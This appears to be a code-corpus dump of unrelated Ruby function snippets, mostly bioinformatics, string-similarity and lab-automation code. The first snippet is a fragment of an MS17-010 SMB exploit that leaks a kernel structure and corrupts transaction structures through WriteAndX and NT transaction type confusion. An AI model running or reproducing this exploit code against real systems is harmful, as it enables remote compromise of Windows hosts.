##{i.to_s}\")\n\n # we don't need to do any cleanup in this case\n if i == datastore['LEAKATTEMPTS'] - 1\n raise MS17_010_Error, \"Abort after using up all LEAKATTEMPTS.\"\n end\n\n # close pipe, disconnect IPC$\n pipe_handle.close()\n self.simple.client.tree_disconnect()\n\n # connect IPC$, open pipe\n self.simple.client.tree_connect(\"\\\\\\\\#{@ctx['ip']}\\\\IPC$\")\n pipe_handle = self.simple.create_pipe(@ctx['pipe_name'], 'o')\n end\n\n @ctx['fid'] = pipe_handle.file_id\n @ctx['pipe_handle'] = pipe_handle\n @ctx = @ctx.merge(leakInfo)\n\n vprint_status(\"Leaked connection struct (0x#{@ctx['connection'].to_s(16)}), performing WriteAndX type confusion\")\n\n # ================================\n # shift transGroom.Indata ptr with SmbWriteAndX\n # ================================\n shift_indata_byte = 0x200\n do_write_andx_raw_pipe(fid:pipe_handle.file_id, data: Rex::Text.rand_text_alpha(shift_indata_byte))#'A'*shift_indata_byte)\n\n # Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.\n # So the below operation is still dangerous. 
Write only 1 byte with \"\\x00\" might be safe even alignment is wrong.\n # maxParameterCount (0x1000), trans name (4), param (4)\n indata_value = @ctx['next_page_addr'] + @ctx['TRANS_SIZE'] + 8 + @ctx['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte\n indata_next_trans_displacement = @ctx['trans2_addr'] - indata_value\n\n # if the overwritten is correct, a modified transaction mid should be special_mid now.\n # a new transaction with special_mid should be error.\n delta = indata_next_trans_displacement + @ctx['TRANS_MID_OFFSET']\n pkt = create_nt_trans_secondary_packet(mid: pipe_handle.file_id, data: \"\\x00\",\n dataDisplacement: delta)\n\n self.simple.client.smb_send(pkt.to_s)\n\n # wait for completion\n do_smb_echo()\n\n pkt = create_nt_trans_packet(5, mid: @@special_mid, param: [pipe_handle.file_id].pack(\"V\"), data: '')\n recvPkt = smb_send_recv_raw(pkt.to_s)\n\n errno = recvPkt['Payload']['SMB'].v['ErrorClass']\n if errno != 0x10002 # non-specific server error\n raise MS17_010_Error, \"Unexpected return status during overwrite: 0x#{errno.to_s(16)}\"\n end\n\n vprint_status(\"Control of groom transaction\")\n\n fmt = @ctx['PTR_FMT']\n # use transGroom to modify trans2.InData to &trans1. so we can modify trans1 with trans2 data\n pkt = create_nt_trans_secondary_packet(mid: pipe_handle.file_id, data: [@ctx['trans1_addr']].pack(fmt),\n dataDisplacement: indata_next_trans_displacement + @ctx['TRANS_INDATA_OFFSET'])\n self.simple.client.smb_send(pkt.to_s)\n\n do_smb_echo()\n\n # - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)\n # - trans1.InData to &trans2. so we can modify trans2 with trans1 data\n pkt = create_nt_trans_secondary_packet(mid: @@special_mid,\n data: [@ctx['trans1_addr'], @ctx['trans1_addr']+0x200, @ctx['trans2_addr']].pack(fmt * 3),\n dataDisplacement: @ctx['TRANS_INPARAM_OFFSET'])\n self.simple.client.smb_send(pkt.to_s)\n\n do_smb_echo()\n\n # modify trans2.mid\n @ctx['trans2_mid'] = next_multiplex_id()\n pkt = create_nt_trans_secondary_packet(mid: @ctx['trans1_mid'],\n data: [@ctx['trans2_mid']].pack('v'),\n dataDisplacement: @ctx['TRANS_MID_OFFSET'])\n self.simple.client.smb_send(pkt.to_s)\n end",
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def alignment= value\n raise unless ALIGNMENTS.any? {|a| a == value }\n @alignment = value\n end",
"def combine_genomes(genome_a, genome_b)\n genome_a = genome_a.split('')\n genome_b = genome_b.split('')\n\n new_genome = \"\"\n 50.times do |i|\n if rand(2) == 1\n new_genome += genome_a[i]\n else\n new_genome += genome_b[i]\n end\n end\n\n mutation(new_genome)\n end",
"def compare_two_seq2(sequence1 = \"\", sequence2 = \"\")\n aln_seq = muscle_sequence2(sequence1,sequence2)\n seq1 = aln_seq[0]\n seq2 = aln_seq[1]\n length = seq1.size\n diff = 0\n (0..(length-1)).each do |position|\n nt1 = seq1[position]\n nt2 = seq2[position]\n diff += 1 unless nt1 == nt2\n end\n return diff\nend",
"def compute_sequence_similarity(ref_sequence, other_sequence)\n total = Repositext::Utils::ArrayDiffer.diff(ref_sequence, other_sequence)\n same = total.find_all { |e| '=' == e.action }\n return 1.0 if same.length == total.length\n return 0.0 if 0 == total.length\n same.length / total.length.to_f\n end",
"def aligned_sequence(start=0,stop = nil,noindent=false) \n self._get_aligned_sequence_from_original_sequence_and_cigar_line\n #seq = AlignSeq.new(self.get_slice.seq,self.cigar_line,start,stop).align\n #return Bio::FastaFormat.new(Bio::Sequence::NA.new(seq).to_fasta(\"#{self.find_organism}\"))\n end",
"def misplacements(true_vals, sample_vals)\n count = 0\n (0...true_vals.size).each do |i|\n count += 1 if true_vals[i][:index] != sample_vals[i][:index]\n end\n count\nend",
"def test_project_from_assembly_to_contigs_with_strand\n # This chromosomal region is covered by 4 contigs and 3 gaps\n # One of the contigs are on the reverse strand.\n assert_equal(7, @target_slices_contigs_with_strand.length)\n assert_equal('contig:Btau_4.0:AAFC03028964:90:9214:1', @target_slices_contigs_with_strand[0].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[1].class)\n assert_equal('contig:Btau_4.0:AAFC03028959:1:1746:-1', @target_slices_contigs_with_strand[2].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[3].class)\n assert_equal('contig:Btau_4.0:AAFC03028970:1:17365:1', @target_slices_contigs_with_strand[4].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[5].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:35:1', @target_slices_contigs_with_strand[6].display_name)\n end",
"def query_align(seqs, *arg)\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs, *arg)\n end\n query_string(seqs.to_fasta(70))\n end",
"def all_files_aligned?\n return false unless files.count > 1 # have to be at least 2 files to be aligned\n # for every fa file there is a corresponding afa file\n # means that chopping off the extensions there will be 2 of every file\n #\n # basename('') chops off both the prefix and the suffix provided so\n # /path/to/foo.fa => foo\n (absolute_path.glob('*.fa').map {|f| f.basename('.fa')} - absolute_path.glob('*.afa').map {|f| f.basename('.afa')}).empty?\n end",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def measure_string_overlap(string_a, string_b)\n overlap = 3\n lcs = 1.0\n min_string_length = [string_a, string_b].map(&:length).min\n prev_sim = 0\n max_sim = 0\n overall_sim = string_a.longest_subsequence_similar(string_b)\n puts \"Overall similarity: #{ overall_sim.round(3) }\"\n similarity_threshold = 0.95\n\n until(\n 1.0 == max_sim ||\n (overlap > 5 && max_sim >= similarity_threshold) ||\n overlap >= min_string_length\n ) do\n puts ''\n string_a_end = string_a[-overlap..-1]\n string_b_start = string_b[0..(overlap-1)]\n sim = string_a_end.longest_subsequence_similar(string_b_start)\n puts [\n ('█' * (sim * 10).round).rjust(10),\n ' ',\n string_a_end.inspect\n ].join\n puts [\n sim.round(3).to_s.rjust(10).color(prev_sim <= sim ? :green : :red),\n ' ',\n string_b_start.inspect\n ].join\n if sim > max_sim\n optimal_overlap = overlap\n end\n max_sim = [max_sim, sim].max\n prev_sim = sim\n overlap += 1\n end\n if max_sim > similarity_threshold\n optimal_overlap\n else\n 0\n end\nend",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def checkLengths(inputStr,lengthStr)\n ops_by_row = Hash.new { |hash, key| hash[key] = [] } # will hold Y/N length ok data\n operations.each do |op| # group by row\n ops_by_row[\"#{op.get(:qc_row)}\"].push op\n end\n ops_by_row.each do |row, ops|\n data = show do\n title \"Row #{row.to_i + 1}: verify that each lane matches expected size\"\n note \"Look at the gel image, and match bands with the lengths listed on the side of the gel image.\"\n note \"For more accurate values, select each well under <b>analyze</b> -> <b>electropherogram</b> to see peaks for fragments found with labeled lengths.\"\n note \"Select No if there is no band or band does not match expected size,\n select N/A if expected length is N/A and there is a band.\"\n ops.each do |op|\n select [\"Yes\", \"No\",\"N/A\"], \n var: \"verify[#{op.get(:qc_row)}][#{op.get(:qc_column)}]\", \n label: \"Does gel lane in column #{op.get(:qc_column) + 1} match the expected length of #{op.input(lengthStr).val} bp?\"\n end \n end \n # associate Y/N answers for row - to plan or to sample?\n ops.each do |op|\n item_id = op.input(inputStr).item.id\n op.plan.associate \"qc_result_#{item_id}_row_#{op.get(:qc_row)}column_#{op.get(:qc_column)}\", data[\"verify[#{op.get(:qc_row)}][#{op.get(:qc_column)}]\".to_sym]\n op.input(inputStr).item.associate \"qc_result_#{item_id}_row_#{op.get(:qc_row)}column_#{op.get(:qc_column)}\", data[\"verify[#{op.get(:qc_row)}][#{op.get(:qc_column)}]\".to_sym]\n end\n end\n end",
"def corrections\n #For each word to be looked at\n $words.each do |word_array|\n #If the word is misspelled attempt corrections\n possible_matches = Array.new\n if word_array[1] == false\n #Sets word to the actual word, instead of array pair\n word = word_array[0]\n # Get lexicon searching vars\n first_char = word[0]\n len = word.length\n\n ##Find words with similar letters\n #Saves the length of the word for eaiser access\n size = word.length\n #Iterates over words with matching starting letter and length +- 1\n $lexicon[first_char][len].each do |word_compare|\n possible_matches << word_compare[0]\n end\n\n # only check shorter words if length is greater than 1\n if len > 1\n $lexicon[first_char][len-1].each do |word_compare|\n possible_matches << word_compare[0]\n end\n end\n\n $lexicon[first_char][len+1].each do |word_compare|\n possible_matches << word_compare[0]\n end\n\n #Iterate over the possible matches, taking the match with the highest percentage\n #Hash to hold similarity\n similarity = Hash.new(0.0)\n possible_matches.each do |word_to_compare|\n similarity[word_to_compare] = match_percentage word, word_to_compare\n end\n\n best_match = ''\n similarity.each do |match|\n if match[1] > similarity[best_match]\n best_match = match[0]\n end\n end\n $correction[word] = best_match\n end\n end\nend",
"def aligns(map: @map, cursor: @cursor, width: @width)\n return 0 unless exit_allowed?\n tmp_cursor = cursor.copy\n tmp_cursor.forward!()\n tmp_cursor.shift!(:left)\n left_square = map.square(cursor.map_pos)\n tmp_cursor.shift!(:right, width + 1)\n right_square = map.square(cursor.map_pos)\n alignments = 0\n alignments += 1 if left_square.edges[cursor.facing(:right)] == :wall\n alignments += 1 if right_square.edges[cursor.facing(:left)] == :wall\n return alignments\n end",
"def ensure_sequence_setup(table_pair, increment, left_offset, right_offset)\n table_options = options(table_pair[:left])\n if table_options[:adjust_sequences]\n rep_prefix = table_options[:rep_prefix]\n left_sequence_values = session.left.sequence_values rep_prefix, table_pair[:left]\n right_sequence_values = session.right.sequence_values rep_prefix, table_pair[:right]\n [:left, :right].each do |database|\n offset = database == :left ? left_offset : right_offset\n session.send(database).update_sequences \\\n rep_prefix, table_pair[database], increment, offset,\n left_sequence_values, right_sequence_values, table_options[:sequence_adjustment_buffer]\n end\n end\n end",
"def warp_aligned\n\n align = params[:align]\n append = params[:append]\n destmap = Map.find(params[:destmap])\n\n if destmap.status.nil? or destmap.status == :unloaded or destmap.status == :loading\n flash.now[:notice] = \"Sorry the destination map is not available to be aligned.\"\n redirect_to action: \"show\", id: params[:destmap]\n elsif align != \"other\"\n\n if params[:align_type] == \"original\"\n destmap.align_with_original(params[:srcmap], align, append )\n else\n destmap.align_with_warped(params[:srcmap], align, append )\n end\n flash.now[:notice] = \"Map aligned. You can now rectify it!\"\n redirect_to action: \"warp\", id: destmap.id\n else\n flash.now[:notice] = \"Sorry, only horizontal and vertical alignment are available at the moment.\"\n redirect_to action: \"align\", id: params[:srcmap]\n end\n end",
"def display_disorder_annotated_alignment\n thread_num = 65\n @display_array = Array.new\n @max_count = 0\n @contact_consensus_array = Array.new\n @seq_contact_count = Alignment.all(:alignment_name => Alignment.get(params[:id]).alignment_name).count\n longest_alignment = 0;\n alignment_array = []\n @alignment_name = Alignment.get(params[:id]).alignment_name\n Alignment.all(:alignment_name => Alignment.get(params[:id]).alignment_name, \n :order => [:align_order.asc]).each do |alignment|\n puts alignment.alignment_sequence.length\n if alignment.alignment_sequence.length > longest_alignment\n longest_alignment = alignment.alignment_sequence.length\n end\n alignment_array << alignment\n end\n for i in 0..longest_alignment+1\n @contact_consensus_array[i] = Array.new(@seq_contact_count, 0)\n end\n #@contact_consensus_array = Array.new(longest_alignment, Array.new(@seq_contact_count,0))\n puts @contact_consensus_array.length\n puts \"Into The Threads\"\n thread_array=[]\n thread_num.times do |i|\n thread_array[i] = Thread.new{\n while alignment_array.length > 0 do\n alignment = alignment_array.pop\n sequence= alignment.sequence\n display_hash = Hash.new\n alignment_color_array = Array.new \n cur_position = 0 \n orig_position = 0\n AlignmentPosition.all(:alignment_id => alignment.align_id, \n :order => [:alignment_position_id.asc]).each do |position|\n if position.position == cur_position\n amino_acid = sequence.a_asequences.first(:original_position=>orig_position) #AAsequence.first(:id => position.aasequence_id)\n unless amino_acid.nil?\n alignment_color_array[cur_position] = residue_color(amino_acid.disorder_consensus, 0)\n if @contact_consensus_array[cur_position][alignment.align_order].nil?\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n if amino_acid.disorder_consensus >= 0.5\n @contact_consensus_array[cur_position][alignment.align_order] = @contact_consensus_array[cur_position][alignment.align_order] + 1\n end\n else\n puts \"Amino Acid doesn't exits: #{sequence.abrev_name} | #{cur_position}:#{orig_position}\" \n alignment_color_array[cur_position] = residue_color(0, 0)\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n else\n while position.position > cur_position\n alignment_color_array[cur_position] = \"FFFFFF\"\n cur_position += 1\n end\n amino_acid = sequence.a_asequences.first(:original_position=>orig_position) #AAsequence.first(:id => position.aasequence_id)\n unless amino_acid.nil?\n alignment_color_array[cur_position] = residue_color(amino_acid.disorder_consensus, 0)\n if @contact_consensus_array[cur_position].nil?\n puts \"OH no \" + alignment.sequence.abrev_name\n end\n if @contact_consensus_array[cur_position][alignment.align_order].nil?\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n if amino_acid.disorder_consensus >= 0.5\n @contact_consensus_array[cur_position][alignment.align_order] = @contact_consensus_array[cur_position][alignment.align_order] + 1\n end\n else\n puts \"Amino Acid doesn't exits: #{sequence.abrev_name} | #{cur_position}:#{orig_position}\" \n alignment_color_array[cur_position] = residue_color(0, 0)\n @contact_consensus_array[cur_position][alignment.align_order] = 0\n end\n end\n cur_position += 1\n orig_position +=1\n end \n puts display_hash[\"name\"] = Sequence.first(:seq_id => alignment.seq_id).abrev_name \n display_hash[\"alignment\"] = alignment_color_array\n @display_array[alignment.align_order] = display_hash\n if @max_count < cur_position\n @max_count = cur_position\n 
end\n end\n }\n end\n thread_array.map{|t| t.join}\n\n @contact_consensus_array = @contact_consensus_array.map{|a| a.inject(0){|sum,item| sum + item}}\n @cur_position = 0\n @tick_counter = 0\n @alignment_tick_array = Array.new\n while @cur_position <= @max_count\n @cur_position += 1\n @tick_counter += 1\n if @tick_counter != 25\n @alignment_tick_array << \"FFFFFF\"\n else\n @alignment_tick_array << \"000000\"\n @tick_counter = 0\n end\n end\n @display_hash = Hash.new\n @display_hash[\"name\"] = \"\"\n @display_hash[\"alignment\"] = @alignment_tick_array \n @display_array << @display_hash\n if params[:aa_length].nil?\n @aa_length = 400\n else\n @aa_length = params[:aa_length].to_i\n end\n @ranges = (@max_count/@aa_length)\n\n end",
"def target_len; genomic.len; end",
"def match_percentage incorrect, possible\n #Creates character arrays for both words\n incorrect_array = incorrect.split(\"\")\n possible_array = possible.split(\"\")\n\n #Hashes to hold count of each char\n incorrect_hash = Hash.new(0)\n possible_hash = Hash.new(0)\n\n #Counts the characters in each word\n incorrect_array.each do |char|\n incorrect_hash[char] += 1\n end\n possible_array.each do |char|\n possible_hash[char] += 1\n end\n \n ##Compares the two hashes and returns similarity as a decimal\n #The overall percentage and total characters, used to calculate final percentage\n overall_percentage = 0.to_f\n total_chars = [incorrect_hash.keys.length, possible_hash.keys.length].max\n #Iterates over the hash for the possible correction\n possible_hash.each do |chars|\n #Sets char to the actual character\n char = chars[0]\n #Sets value_possible to count in possible hash\n value_possible = chars[1]\n #Sets value_incorrect to count in incorrect hash\n value_incorrect = incorrect_hash[char]\n\n #If neither value is zero calcluates similarity and adds to overall_percentage, otherwise its 0\n if value_possible != 0 && value_incorrect != 0\n min = [value_possible, value_incorrect].min\n max = [value_possible, value_incorrect].max\n overall_percentage += (min.to_f / max.to_f)\n end\n end\n #Calculates similarity percentage and returns\n overall_percentage /= total_chars\n\n return overall_percentage * $lexicon[possible[0]][possible.length][possible]\nend",
"def check_alignment_marker(marker_name:)\n alignment_marker_sample = Sample.find_by(name: marker_name)\n stripwell_type = ObjectType.find_by(name: 'Stripwell')\n \n # all stripwells\n stripwells = Collection.where(object_type_id: stripwell_type.id).where.not(location: 'deleted')\n # all stripwells where the sample is the marker \n marker_stripwells = stripwells.select { |s| s.part(0,0)&.sample_id == alignment_marker_sample.id }\n # all stripwells where the location is fragment analyzer \n markers_in_analyzer = marker_stripwells.select { |s| s.location == \"Fragment Analyzer\" || s.location == \"Fragment analyzer\"}\n # check if the array of markers is > \n raise \"There can only be one Stripwell in the Fragment Analyzer\" if markers_in_analyzer.length > 1\n # all stripwells where the location is not fragment analyzer 1\n stripwell_replacement = marker_stripwells.reject { |s| s.location == \"Fragment Analyzer\" || s.location == \"Fragment analyzer\"}\n \n stripwell_replacement = stripwell_replacement.first\n marker_in_analyzer = markers_in_analyzer.first\n \n raise \"Stripwell - Fragment analyzer cannot be found\" if marker_in_analyzer.nil?\n \n marker_needs_replacing = marker_in_analyzer.get(:begin_date) ? (Date.today - (Date.parse marker_in_analyzer.get(:begin_date)) >= 7) : true\n marker_needs_replacing = marker_needs_replacing && (markers_in_analyzer.length == 0)\n \n if marker_needs_replacing && stripwell_replacement\n show do\n title \"Place stripwell #{stripwell_replacement} in buffer array\"\n note \"Move to the fragment analyzer.\"\n note \"Open ScreenGel software.\"\n check \"Click on the \\\"Load Position\\\" icon.\"\n check \"Open the sample door and retrieve the buffer tray.\"\n warning \"Be VERY careful while handling the buffer tray! Buffers can spill.\"\n check \"Discard the current alignment marker stripwell (labeled #{marker_in_analyzer}).\"\n check \"Place the alignment marker stripwell labeled #{stripwell_replacement} in the MARKER 1 position of the buffer array.\"\n image \"make_marker_placement\"\n check \"Place the buffer tray in the buffer tray holder\"\n image \"make_marker_tray_holder\"\n check \"Close the sample door.\"\n end\n \n stripwell_replacement.location = \"Fragment analyzer\"\n stripwell_replacement.associate :begin_date, Date.today.strftime\n stripwell_replacement.save\n release [stripwell_replacement]\n marker_in_analyzer.mark_as_deleted\n \n end\n end",
"def remove_inserts\n\n currseq = \"\"\n currname = \"\"\n # TODO: extract this from all methods to a helper class \n @content.each do |line|\n # if name anchor is found start a new bin\n if (line =~ /^>(.*)/)\n # check if we found next bin\n if (currseq.length > 0)\n # push name and sequence to containers\n @names << currname\n @seqs << currseq\n end\n # name is found next to anchor\n currname = $1\n # no sequence data yet\n currseq = \"\"\n else\n # append sequence data\n currseq += line\n end \n end \n # collect the data from the last bin\n if (currseq.length > 0)\n @names << currname\n @seqs << currseq\n end\n \n match_cols = []\n \n # Determine which columns have a gap in first sequence (match_cols = false)\n residues = @seqs[0].unpack(\"C*\")\n residues.each_index do |num|\n if (residues[num] == 45 || residues[num] == 46)\n match_cols[num] = false\n else\n match_cols[num] = true\n end\n end\n \n # Delete insert columns\n @names.each_index do |i|\n # Unpack C : 8-bit unsigned integer , push -> Array\n residues = @seqs[i].unpack(\"C*\")\n seq = \"\"\n # traverse over Integer Representation\n residues.each_index do |num|\n # If the base Sequence has no gap then check current sequence \n if (match_cols[num])\n if (residues[num] == 45 || residues[num] == 46)\n # Add gap to Sequence\n seq += \"-\"\n else\n # Add the Residue to Sequence\n seq += residues[num].chr\n end \n end \n end\n # Remove anchoring String Characters\n seq.tr!('^a-zA-Z-','')\n # Push an Upper Case representation to the @seqs array\n @seqs[i] = seq.upcase\n # Check whether all sequences have same length as parent\n if (@seqs[i].length != @seqs[0].length)\n logger.debug \"ERROR! Sequences in alignment do not all have equal length!\"\n end\n end\n end",
"def mixgenes( mgenes, sgenes ) ## returns babygenes\n ## note: reverse genes strings (in kai) so index 0 is the first number\n ## index 1 is the second number etc.\n mgenes = mgenes.reverse\n sgenes = sgenes.reverse\n\n babygenes = \"?\"*48 ## string with 48 question marks (?)\n\n # PARENT GENE SWAPPING\n 12.times do |i| # loop from 0 to 11 # for(i = 0; i < 12; i++)\n puts \"parent gene swapping i: #{i}\"\n index = 4*i # index = 4 * i\n 3.downto(1) do |j| ## loop from 3 to 1 # for (j = 3; j > 0; j--)\n puts \" j: #{j}\"\n if rand(100) < 25 # if random() < 0.25:\n mgenes[index+j-1], mgenes[index+j] = # swap(mGenes, index+j, index+j-1)\n mgenes[index+j], mgenes[index+j-1]\n end\n if rand(100) < 25 # if random() < 0.25:\n sgenes[index+j-1], sgenes[index+j] = # swap(sGenes, index+j, index+j-1)\n sgenes[index+j], sgenes[index+j-1]\n end\n end\n end\n\n # BABY GENES\n 48.times do |i| # loop from 0 to 47 # for (i = 0; i < 48; i++):\n puts \"baby genes i: #{i}\"\n mutation = nil # mutation = 0\n # # CHECK MUTATION\n if i % 4 == 0 # if i % 4 == 0:\n gene1 = Kai::NUMBER[ mgenes[i] ] # gene1 = mGene[i]\n gene2 = Kai::NUMBER[ sgenes[i] ] # gene2 = sGene[i]\n if gene1 > gene2 # if gene1 > gene2:\n gene1, gene2 = gene2, gene1 # gene1, gene2 = gene2, gene1\n end\n if (gene2 - gene1) == 1 && gene1.even? # if (gene2 - gene1) == 1 and iseven(gene1):\n probability = 25 # probability = 0.25\n if gene1 > 23 # if gene1 > 23:\n probability /= 2 # probability /= 2\n end\n if rand(100) < probability # if random() < probability:\n mutation = Kai::ALPHABET[ (gene1/2)+16 ] # mutation = (gene1 / 2) + 16\n end\n end\n end\n # GIVE BABY GENES\n if mutation # if mutation:\n babygenes[i]=mutation # baby[i] = mutation\n else # else:\n if rand(100) < 50 # if random() < 0.5:\n babygenes[i] = mgenes[i] # babyGenes[i] = mGene[i]\n else # else:\n babygenes[i] = sgenes[i] # babyGenes[i] = sGene[i]\n end\n end\n end\n\n babygenes.reverse # return bagygenes (reversed back)\nend",
"def overlaps(gses, gsms, verbose=false)\n overlap = 0\n nontrivial = 0\n ngses = gses.length\n # Computing the intersection is what takes time\n gses.each_with_index { |gse1, i|\n (i+1 ... ngses).each { |j|\n gse2 = gses[j]\n ind = gsms[gse1].intersectionIndicator( gsms[gse2], 2 )\n if ind > 0\n overlap += 1\n nontrivial += 1 if ind > 1\n print \"#{gse1} ^ #{gse2} = #{gsms[gse1].intersection( gsms[gse2] ).length}\\n\" if verbose\n end\n }\n }\n [overlap, nontrivial]\nend",
"def near_match\n (0..3).each do |guess_index|\n compare_for_near_match(guess_index)\n end\n end",
"def match(array_possible_anagrams)\n matching_words=[]\n word_broken=self.word.split(\"\").sort\n array_possible_anagrams.each do |possible_match|\n #possible_match=possible.word\n possible_match_broken=possible_match.split(\"\").sort\n if possible_match_broken == word_broken\n matching_words << possible_match\n else\n end #end of if\n end #end of do\n matching_words\n end",
"def find_alignment (alignment)\r\n total = 0\r\n weighted_alignment = alignment.each do |alignment|\r\n alignment.weight = alignment.weight + total\r\n total = alignment.weight\r\n alignment\r\n end\r\n percentage = rand(1..total)\r\n weighted_alignment.each do |alignment|\r\n return alignment.name if percentage <= alignment.weight\r\n end\r\nend",
"def build_lcs_length_table(str1, str2)\n p str1\n p str2\n lcs_length_table = []\n directional_table = nil\n #in both of the table the the first dimansion representing str2 and the second demansion representing str1\n (0..str2.size).each do |i|\n lcs_length_table[i] = [0]\n end\n \n (0..str1.size).each do |j|\n lcs_length_table[0][j] = 0\n end\n \n directional_table = deep_copy(lcs_length_table)\n\n (1..str2.size).each do |j|\n (1..str1.size).each do |i|\n devired_val = [ lcs_length_table[ j - 1 ][i], lcs_length_table[ j][ i -1 ]].max\n #determind the direction of the devired_val\n if lcs_length_table[ j - 1 ][i] == devired_val #prefre go up first when the two values are the same\n devired_from = \"^\"\n else\n devired_from = \"<\"\n end\n #puts \"#{\"\"<<str2[j - 1] } #{\"\"<<str1[i - 1]} #{j-1} #{i-1}\"\n if str2[j - 1] == str1[i - 1]\n lcs_length_table[j][i] = lcs_length_table[j-1][i-1] + 1\n directional_table[j][i] = \"=\"\n else\n lcs_length_table[j][i] = devired_val\n directional_table[j][i] = devired_from\n end\n end\n end\n\n\n lcs_length_table.each do |row|\n p row\n end\n\n directional_table.each do |row|\n p row\n end\n \n p get_common_sequence_from_directional_table(directional_table, str1.size, str2.size, str2)\n\n return lcs_length_table\nend",
"def amino_acid_2 (bases)\n bases_to_aa = []\n aa_list = []\n base1 = bases[0].to_list\n base2 = bases[1].to_list\n base3 = bases[2].to_list\n l1 = base1.size - 1\n l2 = base2.size - 1\n l3 = base3.size - 1\n (0..l1).each do |n1|\n b1 = base1[n1]\n (0..l2).each do |n2|\n b2 = base2[n2]\n (0..l3).each do |n3|\n b3 = base3[n3]\n bases_all = b1 + b2 + b3\n bases_to_aa << bases_all\n end\n end\n end\n\n bases_to_aa.each do |base|\n case base\n when /^TT[TCY]$/\n aa = \"F\"\n when /^TT[AGR]$/\n aa = \"L\"\n when /^CT.$/\n aa = \"L\"\n when /^AT[TCAHYWM]$/\n aa = \"I\"\n when \"ATG\"\n aa = \"M\"\n when /^GT.$/\n aa = \"V\"\n when /^TC.$/\n aa = \"S\"\n when /^CC.$/\n aa = \"P\"\n when /^AC.$/\n aa = \"T\"\n when /^GC.$/\n aa = \"A\"\n when /^TA[TCY]$/\n aa = \"Y\"\n when /^TA[AGR]$/\n aa = \"*\"\n when /^T[GR]A$/\n aa = \"*\"\n when /^CA[TCY]$/\n aa = \"H\"\n when /^CA[AGR]$/\n aa = \"Q\"\n when /^AA[TCY]$/\n aa = \"N\"\n when /^AA[AGR]$/\n aa = \"K\"\n when /^GA[TCY]$/\n aa = \"D\"\n when /^GA[AGR]$/\n aa = \"E\"\n when /^TG[TCY]$/\n aa = \"C\"\n when \"TGG\"\n aa = \"W\"\n when /^CG.$/\n aa = \"R\"\n when /^AG[TCY]$/\n aa = \"S\"\n when /^[AM]G[AGR]$/\n aa = \"R\"\n when /^GG.$/\n aa = \"G\"\n when /^[ATW][CGS][CTY]$/\n aa = \"S\"\n when /^[TCY]T[AGR]$/\n aa = \"L\"\n else\n aa = \"-\"\n end\n aa_list << aa\n end\n aa_out = aa_list.uniq.join\n return aa_out\n end",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = 